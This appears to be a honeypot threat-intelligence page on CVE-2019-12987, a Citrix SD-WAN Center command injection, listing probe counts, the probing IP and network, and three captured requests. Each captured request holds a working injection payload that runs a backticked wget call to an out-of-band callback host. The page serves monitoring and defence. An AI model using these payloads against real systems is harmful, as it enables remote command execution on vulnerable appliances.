CVE-2019-12987: Citrix SD-WAN Center - Remote Command Injection

HoneyLabs honeypots recorded 3 probes matching CVE-2019-12987 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.

Request paths that identify it

  • /Collector/storagemgmt/apply

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2143Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited31

Captured requests

  • /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://dat5s2dr4bohuvf6jbkg3ufnn8ib6hthf.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype
  • /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://daucadtr4bot53oq70f0n6z9ff1zjjx4n.oast.pro%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype
  • /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://dats27tr4bou0ol2jq504iae7s46hjjd1.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype

CVE report

CVE report

Open a specific CVE from the CVE tracker.